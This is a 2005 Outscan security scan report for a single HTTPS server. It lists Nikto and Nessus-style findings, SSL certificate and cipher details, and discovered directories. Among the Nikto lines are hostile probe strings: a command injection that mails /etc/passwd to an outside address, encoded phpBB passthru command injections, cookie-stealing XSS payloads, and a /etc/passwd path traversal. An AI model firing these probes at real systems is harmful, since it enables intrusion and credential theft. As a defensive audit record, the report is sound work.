XXXXXXX Security Test Report Sections >> Report info >> Executive summary - Security Risk Overview >> Executive summary - Security Threat Categories >> Executive summary - Security Threat Families >> Host list summary >> Threat list >> Executive summary - Security Top Port List >> Open port list >> Modification list >> Active disabled script list >> High risk threat details >> Medium risk threat details >> Low risk threat details >> Other risk threat details Report id: E6B54E9C27491DB7BD4E566BEBAB8B34 Report info group: None Host: IP.OF.THE.SERVER Date: 2005-10-27 00:03 - 2005-10-27 00:03 Number of tests: 1 Number of threats found: 14 Executive summary - Security Risk Overview [ High Risk ] These types of threats should beaddressed first and are typically easy to exploit.These security threats can compromise the integrity of your data, be used to take your system(s) off-line, or can be used for denial of service (DoS). [ Medium Risk ] Security threats, which can open your system(s) to unauthorized access or expose your data, are considered medium risk. Although usually (but not always) more complex to exploit, these types of threats are also very important to address. [ Low Risk ] This level of security threats is used for problems that typically cannot be used independently to gain unauthorized access to your data or compromise your system(s). However, these types of threats are commonly combined with other information to exploit your network. [ Other Risk ] This classification is used to provide informational data about your system(s). These types of security threats are typically not direct vulnerabilities, but they do expose additional information and data about your network. Executive summary - Security Threat Categories [ Hole ] This part of the report is very important. It shows how manysecurity holes Outscan has discovered. They are divided into 4 levels (low to high). [ Info ] This shows how many enumerations Outscan has found.Information leakage from your server. Usernames, Passwords,Software versions. This method uses four levels (low to high) listed belowwhilst scanning. [ Port ] This part of the report contains information on how many services have open ports on your computer that Outscan was able to find using different scanning methods like SYN / FIN / CONNECT() / UDP. Executive summary - Security Threat Families Family List: This part of the report list the families with threats detected. Host list summary High Risk: Medium Risk: Low Risk: Other Risk: Open ports: Time start: Time end: Level: Template: IP.OF.THE.SERVER 1 3 2 8 1 2005-10-27 2005-10-27 normal None 00:03 00:21 Threat list summary High Risk: Medium Risk: IP.OF.THE.SERVER - 2005-10-27 00:03 Hole (443/tcp) https Info (443/tcp) https Hole (443/tcp) https Info General Low Risk: Other Risk: Hole (443/tcp) https Info (443/tcp) https Info General Info (443/tcp) https Info (443/tcp) https Info (443/tcp) https Info (443/tcp) https Info (443/tcp) https Info General Info General Executive summary - Security Top Port List [ Top Port ] This part of the report list the ports with highest number of threats. Open port list IP.OF.THE.SERVER 443 - https (443/tcp) None Modification list Active disabled script list IP.OF.THE.SERVER None High risk threat details Script id: 10864 Name: Nikto Port: 443 Level: Hole Risk factor: Family: CGI abuses Description: Web server scanner Information: IP.OF.THE.SERVER - 2005-10-27 00:03 Nikto: + /cgi-bin/excite IFS=\\"$\\ " /bin/cat /etc/passwd|mail test@test.com - Excite software is vulnerable to password file theft remotely. (GET) + /admin/admin_phpinfo.php4 - Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected. (GET) Risk factor: High Medium risk threat details Script id: 10864 Name: Nikto Port: 443 Level: Hole Risk factor: Family: CGI abuses Description: Web server scanner Information: IP.OF.THE.SERVER - 2005-10-27 00:03 Nikto: + SSL Info: Ciphers: AES256-SHA + The root file (/) redirects to: https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php + Allowed HTTP Methods: GET, HEAD, POST + / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Default Jrun 2 server running. + / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Cisco VoIP Phone deafult web server found. + / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Default Sybase Jaguar CTS server running. + / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Default Jrun 3 server running. + / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Default Lantronix printer found. + / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Default IBM Tivoli Server Administration server is running. + / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Default Jrun 4 server running. + / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Default Xerox WorkCentre server is running. + /admin/config.php - PHP Config file may contain database IDs and passwords. (GET) + /index.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61 %73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53% 5b%72%75%73%68%5d%29.%2527 - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , phpBB i+ /index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61 %73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53% 5b%72%75%73%68%5d%29.%2527 - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , phpBB i+ /index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%25 27.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%4 1%52%53%5b%72%75%73%68%5d%29.%2527 - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php + /index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2 527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56% 41%52%53%5b%72%75%73%68%5d%29.%2527 - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php + /?mod=< script>alert(document.cookie)< /script>&op=browse - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02. + /?mod=node&nid=some_thing&op=view - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Sage 1.0b3 may reveal system paths with invalid module names. + /?mod=some_thing&op=browse - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Sage 1.0b3 reveals system paths with invalid module names. + /?pattern=/etc/*&sort=name - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl. + /?sql_debug=1 - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string. + / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , PeopleSoft appears to be running. + / - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Samba-swat web server. Used to administer Samba. + //admin/admin.shtml - Axis network camera may allow admin bypass by using double-slashes before URLs. (GET) + //admin/aindex.htm - FlexWATCH firmware 2.2 is vulnerable to authentication bypass by prepending an extra '/'. http://packetstorm.linuxsecurity.com/0310-exploits/FlexWATCH.txt (GET) + /admin/admin.php?adminpy=1 - PY-Membres 4.2 may allow administrator access. (GET) + /admin/contextAdmin/contextAdmin.html - Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin. (GET) + /admin/cplogfile.log - DevBB 1.0 final (http://www.mybboard.com) log file is readable remotely. Upgrade to the latest version. (GET) + /admin/database/wwForum.mdb - Web Wiz Forums pre 7.5 is vulnerable to Cross-Site Scripting attacks. Default login/pass is Administrator/letmein (GET) + /admin/db.php?dump_sql=1 - e107 allows a dump of the MySQL database without authentication. (GET) + /admin/login.php?action=insert&username=test&password=test - phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify. (GET) + /admin/phpinfo.php - Immobilier or phPay allows phpinfo() to be run. See http://www.frogman. org/tutos/Immoblier.txt or http://phpay.sourceforge.net/ (GET) + /admin/system_footer.php - myphpnuke version 1.8.8_final_7 reveals detailed system information. (GET) + /admin/wg_user-info.ml - WebGate Web Eye exposes user names and passwords. OSVDB2922 (GET) + /CVS/Entries - CVS Entries file may contain directory listing information. (GET) + /forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\\">\\"< script>javascript:alert(document.cookie)< /script> - Vbulletin 2.2.9 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02. (alert(document.cookie)< /script>) + /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB12184. (GET) + /index.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB12184. (GET) + /index.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB12184. (GET) + /index.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB12184. (GET) + /index.php?|=../../../../../../../../../etc/passwd - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem. + Over 20 "Moved" messages, this may be a by-product of the + server answering all requests with a "302" or "301" Moved message. You should + manually verify your results. + /index.php/\\">< script>< script>alert(document.cookie)< /script>< -eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02. (GET) + /manual/ - Web server manual? tsk tsk. (GET) + /uploader.php - This script may allow arbitrary files to be uploaded to the remote server. (200) + /admin/ - This might be interesting... (GET) + /admin/auth.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /admin/cfg/configscreen.inc.php+ - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /admin/cfg/configsite.inc.php+ - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /admin/cfg/configsql.inc.php+ - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /admin/cfg/configtache.inc.php+ - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /admin/cms/htmltags.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /admin/credit_card_info.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /admin/exec.php3 - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /admin/index.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /admin/modules/cache.php+ - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /admin/objects.inc.php4 - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /admin/script.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /admin/settings.inc.php+ - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /admin/templates/header.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + /admin/upload.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET) + Over 20 "OK" messages, this may be a by-product of the + server answering all requests with a "200 OK" message. You should + manually verify your results. Risk factor: Medium Script id: 10922 Name: CVS/Entries Port: 443 Risk factor: Level: Info Family: CGI abuses Description: Your website allows read access to the CVS/Entries file. This exposes all file names in your CVS module on your website. Change your website permissions to deny access to your CVS directory. Risk factor : Medium Script id: 11618 Name: Remote host replies to SYN|FIN Port: General Risk factor: Level: Info Family: Firewalls Description: The remote host does not discard TCP SYN packets which have the FIN flag set. Depending on the kind of firewall you are using, an attacker may use this flaw to bypass its rules. Note: *** If the scanned host is a TUNIX/Firewall, this alert can be safely ignored ** * See also : http://archives.neohapsis.com/archives/bugtraq/2002-10/0266.html http://www.kb.cert.org/vuls/id/464113 Risk factor : Medium Solution: Contact your vendor for a patch Bugtraq: 7487  Low risk threat details Script id: 10864 Name: Nikto Port: 443 Level: Hole Risk factor: Family: CGI abuses Description: Web server scanner Information: IP.OF.THE.SERVER - 2005-10-27 00:03 Nikto: + /~root - Enumeration of users is possible by requesting ~username (responds with Forbidden for real users, not found for non-existent users) (GET). + /./ - Redirects to https://yukka.noisalviamoilmondopuntocom.com/journals/starpict_completed.php , Appending '/./' to a directory may reveal php source code. Risk factor: Low Script id: 10287 Name: Traceroute Port: General Risk factor: Level: Info Family: Misc. Description: Makes a traceroute to the remote host. This can be used to gain information on your internet connection helping an attacker to map your network. This information can be used to attack the last server before your and if that server have more access to your server then the rest of the Internet then this can be used to attack services other then the one open to Internet. Risk factor : Low Information: IP.OF.THE.SERVER - 2005-10-27 00:03 For your information, here is the traceroute to IP.OF.THE.SERVER : ? IP.OF.THE.SERVER Other risk threat details Script id: 10107 Name: HTTP Server type and version Port: 443 Level: Info Risk factor: Family: General Description: This detects the HTTP Server's type and version. If the attacker is able to determine the version of the running service he/she may easily find the proper tools and exploits thats required to successfully attack the service. But if the banner is changed it will be more difficult to find the tools. Risk factor : Low Solution: Configure your server to use an alternate name like 'Wintendo httpD w/Dotmatrix display' Be sure to remove common logos like apache_pb.gif. With Apache, you can set the directive 'ServerTokens Prod' to limitthe information emanating from the server in its response headers. On Windows systems you can use a tool that is called URLScan that is developed by Microsoft. Information: IP.OF.THE.SERVER - 2005-10-27 00:03 The remote web server type is : TUNIX httpsscreen Script id: 10330 Name: Services Port: 443 Risk factor: Level: Info Family: Service detection Description: This plugin attempts to guess which services are running on the remote ports. For instance, it searches for a web server which could listen on another port than 80 and set the results in the knowledge base. Risk factor : None Information: IP.OF.THE.SERVER - 2005-10-27 00:03 A SSLv2 server answered on this port IP.OF.THE.SERVER - 2005-10-27 00:03 A web server is running on this port through SSL Script id: 10863 Name: SSL ciphers Port: 443 Risk factor: Level: Info Family: General Description: This plugin connects to a SSL server, and checks its certificate and the available (shared) SSLv2 ciphers. Weak ciphers are reported. Information: IP.OF.THE.SERVER - 2005-10-27 00:03 Here is the SSLv2 server certificate: Certificate: Data: Version: 3 (0x2) Serial Number: 4176025 (0x3fb899) Signature Algorithm: md5WithRSAEncryption Issuer: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc, OU=Certification Services Division, CN=Thawte Premium Server CA/emailAddress=premiumserver@ thawte.com Validity Not Before: Aug 4 14:38:00 2005 GMT Not After : Aug 4 14:38:00 2006 GMT Subject: C=NL, ST=Noord-Holland, L=Amsterdam, O=NoiSalviamoIlMondoPuntoCom, OU=ICT, CN=yukka.noisalviamoilmondopuntocom.com Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit): 00:b2:c7:78:42:60:35:ad:98:bd:d8:73:21:d8:4d: b6:79:4c:28:dc:4c:a3:eb:68:c5:75:f8:e8:99:48: 84:94:bc:8c:5d:53:6a:73:5f:f9:f2:66:7a:8b:5c: aa:fc:b9:a9:df:78:04:1c:6a:42:91:a1:c5:8b:ba: 82:91:7e:ae:98:0d:df:fa:d7:d8:68:2b:3f:4b:ab: 9f:5c:62:12:68:d6:bf:57:75:66:89:20:83:31:81: 5d:d2:c9:9e:95:53:1e:35:3f:bc:fe:c7:2d:bf:f0: 20:cd:77:1e:2f:26:c1:b2:f2:2f:3b:cf:8e:b0:b8: a8:6e:c3:4c:34:af:38:cf:4d Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 CRL Distribution Points: URI:http://crl.thawte.com/ThawtePremiumServerCA.crl Authority Information Access: OCSP - URI:http://ocsp.thawte.com X509v3 Basic Constraints: critical CA:FALSE Signature Algorithm: md5WithRSAEncryption 50:eb:5f:cd:f5:ba:6c:52:ff:91:c8:76:ce:ad:45:f7:b4:2b: c7:ba:4b:78:42:54:8e:0f:f0:f3:95:bd:04:8c:6f:d1:04:24: 5b:2e:d5:0f:50:56:00:75:e3:44:54:9f:0c:8a:bf:cc:2a:85: 1b:d1:0e:96:66:d3:e7:1e:05:da:d7:a2:c2:53:37:96:fc:3d: 3b:e0:e4:bd:9d:24:9b:9c:4f:bf:4d:da:b6:8a:88:cd:6f:a3: 3f:0c:11:56:e7:73:02:8d:dc:fb:35:f0:e4:bc:36:55:7c:e4: 54:ff:b8:53:b2:74:b5:1f:c5:af:e7:c5:b0:c9:56:ab:8c:ce: 2c:73 Here is the list of available SSLv2 ciphers: (ciphers containing "EXP" are considered weak) (ciphers using less than 56 bits are considered weak) (ciphers using less than 90 bits are considered medium) RC4-MD5 EXP-RC4-MD5 RC2-CBC-MD5 EXP-RC2-CBC-MD5 DES-CBC-MD5 DES-CBC3-MD5 RC4-64-MD5The SSLv2 server offers 5 strong ciphers, but also 0 medium strength and 2 weak/"export class" ciphers. The weak/medium ciphers may be chosen by an export-grade or badly configured client software. They only offer limited protection against a brute force attack Solution: disable those ciphers and upgrade your client software if possibleThis SSLv2 server also accepts SSLv3 connections. This SSLv2 server also accepts TLSv1 connections. Script id: 10864 Name: Nikto Port: 443 Risk factor: Level: Info Family: CGI abuses Description: Web server scanner Information: IP.OF.THE.SERVER - 2005-10-27 00:03 Nikto: + Server: TUNIX httpsscreen + PHP/4.3.11 appears to be outdated (current is at least 5.0.3) + 2433 items checked - 40 item(s) found on remote host(s) + 1 host(s) tested Script id: 11032 Name: Directory Scanner Port: 443 Level: Info Risk factor: Family: Misc. Description: This plugin attempts to determine the presence of various common dirs on the remote web server Information: IP.OF.THE.SERVER - 2005-10-27 00:03 The following directories were discovered: /CVS, /admin, /archives, /cgi-bin, /css, /download, /icons, /images, /js, /manual, /cbe, /jobs, /xppubwizard While this is not, in and of itself, a bug, you should manually inspect these directories to ensure that they are in compliance with company security standards Other references : OWASP:OWASP-CM-006 Script id: 20007 Name: Deprecated SSL Protocol Usage Port: 443 Risk factor: Level: Info Family: General Description: The remote service accepts connections encrypted using SSL 2.0, which reportedly suffers from several cryptographic flaws and has been deprecated for several years. An attacker may be able to exploit these issues to conduct man-in-the-middle attacks or decrypt communications between the affected service and clients. See also : http://www.schneier.com/paper-ssl.pdf Risk factor : Low Solution: Consult the application's documentation to disable SSL 2.0 and use SSL 3.0 or TLS 1.0 instead. Script id: 10336 Name: Nmap Port: General Risk factor: Level: Info Family: Port scanners Description: Nmap output: Information: IP.OF.THE.SERVER - 2005-10-27 00:03 The following TCP ports were technically open, but the connection was closed immediately after entering the established state: 80 Script id: 12053 Name: Host FQDN Port: General Level: Info Risk factor: Family: General Description: This plugin writes the host FQDN as it could be resolved in the report. There is no security issue associated to it. Risk factor : None Information: IP.OF.THE.SERVER - 2005-10-27 00:03 IP.OF.THE.SERVER resolves as yukka.noisalviamoilmondopuntocom.com.